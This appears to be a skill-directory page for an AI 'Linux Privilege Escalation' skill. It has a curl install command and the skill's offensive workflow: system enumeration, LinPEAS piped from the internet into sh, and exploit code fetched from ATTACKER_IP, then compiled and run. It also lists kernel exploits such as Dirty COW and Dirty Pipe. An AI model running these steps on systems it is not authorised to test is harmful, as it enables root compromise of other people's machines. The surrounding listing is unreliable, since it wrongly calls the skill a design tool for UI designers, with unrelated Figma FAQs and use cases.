Z
zebbern
@mayurrathi
⭐ 40.7k GitHub stars

Linux Privilege Escalation

Linux Privilege Escalation is an design AI skill with a core value of This skill should be used when the user asks to \"escalate privileges on Linux\", \"find privesc vectors on Linux systems\", \"exploit sudo misconfigurations\", \"abuse SUID binaries\", \"ex. It helps developers solve real-world problems in the design domain, boosting efficiency, automating repetitive tasks, and optimizing workflows.

This skill should be used when the user asks to \"escalate privileges on Linux\", \"find privesc vectors on Linux systems\", \"exploit sudo misconfigurations\", \"abuse SUID binaries\", \"ex...

Last verified on: 2026-07-07

Quick Facts

Category design
Works With Claude
Source sickn33/antigravity-awesome-skills
Stars ⭐ 40.7k
Last Verified 2026-07-07
Risk Level High
mkdir -p ./skills/linux-privilege-escalation && curl -sfL https://raw.githubusercontent.com/sickn33/antigravity-awesome-skills/main/skills/linux-privilege-escalation/SKILL.md -o ./skills/linux-privilege-escalation/SKILL.md

Run in terminal / PowerShell. Requires curl (Unix) or PowerShell 5+ (Windows).

Skill Content

# Linux Privilege Escalation


Purpose


Execute systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses that allow elevation from low-privilege user access to root-level control. This skill enables comprehensive enumeration and exploitation of kernel vulnerabilities, sudo misconfigurations, SUID binaries, cron jobs, capabilities, PATH hijacking, and NFS weaknesses.


Inputs / Prerequisites


Required Access

- Low-privilege shell access to target Linux system

- Ability to execute commands (interactive or semi-interactive shell)

- Network access for reverse shell connections (if needed)

- Attacker machine for payload hosting and receiving shells


Technical Requirements

- Understanding of Linux filesystem permissions and ownership

- Familiarity with common Linux utilities and scripting

- Knowledge of kernel versions and associated vulnerabilities

- Basic understanding of compilation (gcc) for custom exploits


Recommended Tools

- LinPEAS, LinEnum, or Linux Smart Enumeration scripts

- Linux Exploit Suggester (LES)

- GTFOBins reference for binary exploitation

- John the Ripper or Hashcat for password cracking

- Netcat or similar for reverse shells


Outputs / Deliverables


Primary Outputs

- Root shell access on target system

- Privilege escalation path documentation

- System enumeration findings report

- Recommendations for remediation


Evidence Artifacts

- Screenshots of successful privilege escalation

- Command output logs demonstrating root access

- Identified vulnerability details

- Exploited configuration files


Core Workflow


Phase 1: System Enumeration


#### Basic System Information

Gather fundamental system details for vulnerability research:


bash
# Hostname and system role
hostname

# Kernel version and architecture
uname -a

# Detailed kernel information
cat /proc/version

# Operating system details
cat /etc/issue
cat /etc/*-release

# Architecture
arch

#### User and Permission Enumeration


bash
# Current user context
whoami
id

# Users with login shells
cat /etc/passwd | grep -v nologin | grep -v false

# Users with home directories
cat /etc/passwd | grep home

# Group memberships
groups

# Other logged-in users
w
who

#### Network Information


bash
# Network interfaces
ifconfig
ip addr

# Routing table
ip route

# Active connections
netstat -antup
ss -tulpn

# Listening services
netstat -l

#### Process and Service Enumeration


bash
# All running processes
ps aux
ps -ef

# Process tree view
ps axjf

# Services running as root
ps aux | grep root

#### Environment Variables


bash
# Full environment
env

# PATH variable (for hijacking)
echo $PATH

Phase 2: Automated Enumeration


Deploy automated scripts for comprehensive enumeration:


bash
# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# LinEnum
./LinEnum.sh -t

# Linux Smart Enumeration
./lse.sh -l 1

# Linux Exploit Suggester
./les.sh

Transfer scripts to target system:


bash
# On attacker machine
python3 -m http.server 8000

# On target machine
wget http://ATTACKER_IP:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

Phase 3: Kernel Exploits


#### Identify Kernel Version


bash
uname -r
cat /proc/version

#### Search for Exploits


bash
# Use Linux Exploit Suggester
./linux-exploit-suggester.sh

# Manual search on exploit-db
searchsploit linux kernel [version]

#### Common Kernel Exploits


| Kernel Version | Exploit | CVE |

|---------------|---------|-----|

| 2.6.x - 3.x | Dirty COW | CVE-2016-5195 |

| 4.4.x - 4.13.x | Double Fetch | CVE-2017-16995 |

| 5.8+ | Dirty Pipe | CVE-2022-0847 |


#### Compile and Execute


bash
# Transfer exploit source
wget http://ATTACKER_IP/exploit.c

# Compile on target
gcc exploit.c -o exploit

# Execute
./exploit

Phase 4: Sudo Exploitation


#### Enumerate Sudo Privileges


bash
sudo

🎯 Best For

  • UI designers
  • Product designers
  • UX researchers
  • Product managers
  • Claude users

💡 Use Cases

  • Generating component mockups
  • Creating design system tokens
  • Mapping user journeys
  • Identifying friction points

📖 How to Use This Skill

  1. 1

    Install the Skill

    Copy the install command from the Terminal tab and run it. The SKILL.md file downloads to your local skills directory.

  2. 2

    Load into Your AI Assistant

    Open Claude and reference the skill. Paste the SKILL.md content or use the system prompt tab.

  3. 3

    Apply Linux Privilege Escalation to Your Work

    Provide context for your task — paste source material, describe your audience, or share existing work to guide the AI.

  4. 4

    Review and Refine

    Edit the AI output for accuracy, tone, and completeness. Add human insight where the AI lacks context.

❓ Frequently Asked Questions

Does this work with Figma?

Some design skills integrate with Figma plugins. Check the Works With section for supported tools.

Can this analyze user behavior data?

UX research skills work best when you provide session recordings, heatmaps, and analytics data.

Does Linux Privilege Escalation generate production-ready design specs?

It generates detailed specifications that developers can use directly. Review and adjust for your specific design system.

How do I install Linux Privilege Escalation?

Copy the install command from the Terminal tab and run it. The skill downloads to ./skills/linux-privilege-escalation/SKILL.md, ready to use.

Can I customize this skill for my team?

Absolutely. Edit the SKILL.md file to add team-specific instructions, examples, or workflows.

⚠️ Common Mistakes to Avoid

Skipping usability testing

AI-generated designs should be validated with real users before development.

Over-relying on AI insights

UX decisions should combine AI analysis with direct user feedback and research.

Not reading the full skill

Skills contain important context and edge cases beyond the quick start.

🔗 Related Skills